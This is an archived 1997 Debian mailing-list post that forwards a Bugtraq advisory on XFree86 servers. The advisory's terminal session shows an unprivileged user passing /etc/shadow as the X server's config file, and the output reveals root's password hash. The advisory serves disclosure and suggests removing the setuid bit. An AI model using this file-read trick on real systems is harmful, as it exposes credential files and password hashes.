XFree86 insecurity (fwd)

To: debian-user@lists.debian.org
Subject: XFree86 insecurity (fwd)
From: Tommy Lakofski <tommy@88.net>
Date: Fri, 21 Nov 1997 21:02:11 -0500 (EST)
Message-id: <Pine.LNX.3.96.971121205822.6129A-100000@oi.88.net>
Reply-to: Tommy Lakofski <tommy@88.net>

Anyone know if debian is vulnerable to this, given that the setuid
/usr/X11R6/bin/X is a wrapper for the XFree86 server?

I'd like to know before I chmod u-s /usr/X11R6/bin/X...

TIA,

Thomas.

---------- Forwarded message ----------
From: shegget <root@SHEGG.RH1.IIT.EDU>
To: BUGTRAQ@NETSPACE.ORG
Date: Fri, 21 Nov 1997 18:35:36 +0000
Subject: XFree86 insecurity

                  plaguez security advisory n.10

                        XFree86 insecurity




Program:   XF86_*, the XFree86 servers (XF86_SVGA, XF86_VGA16, ...)

Version:   Tested on XFree86 3.3.1 (current), 3.2.9 and 3.1.2.
           Other versions as well.

OS:        All

Impact:    The XFree86 servers let you specify an alternate configuration
           file and do not check whether you have rights to read it.
           Any user can read files with root permissions.




hello,
just a short one to tell you about this "feature" I found in all default
XFree86 servers...


Here it is:

Script started on Sat Aug 23 15:32:36 1997
Loading /usr/lib/kbd/keytables/fr-latin1.map
[plaguez@plaguez plaguez]$ uname -a
Linux plaguez 2.0.31 #10 Wed Aug 20 04:24:38 MET DST 1997 i586
[plaguez@plaguez plaguez]$ ls -al /etc/shadow
-rw-------   1 root     bin          1039 Aug 21 20:12  /etc/shadow
[plaguez@plaguez bin]$ id
uid=502(plaguez) gid=500(users) groups=500(users)
[plaguez@plaguez plaguez]$ cd /usr/X11R6/bin
[plaguez@plaguez bin]$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:<display>] [option]
-a #                   mouse acceleration (pixels)
-ac                    disable access control restrictions
-audit int             set audit trail level
-auth file             select authorization file
bc                     enable bug compatibility
-bs                    disable any backing store support
-c                     turns off key-click

... and so on.  HINT: look at the first XF86_SVGA output line.





Patch:
------

If you run xdm, you should consider removing the setuid bit of the
servers.

If not, well, wait for the XFree86 Project to bring you a patch, since I'm
too lazy to find and fix it.





later,

-plaguez
dube0866@eurobretagne.fr


--
TO UNSUBSCRIBE FROM THIS MAILING LIST: e-mail the word "unsubscribe" to
debian-user-request@lists.debian.org . 
Trouble?  e-mail to templin@bucknell.edu .

Reply to:

Follow-Ups:
- Re: XFree86 insecurity (fwd)
  - From: Hamish Moffatt <hamish@debian.org>

Prev by Date: hamm install and x...
Next by Date: Wild interrupt detection, and ATI bus mouse
Previous by thread: hamm install and x...
Next by thread: Re: XFree86 insecurity (fwd)
Index(es):
- Date
- Thread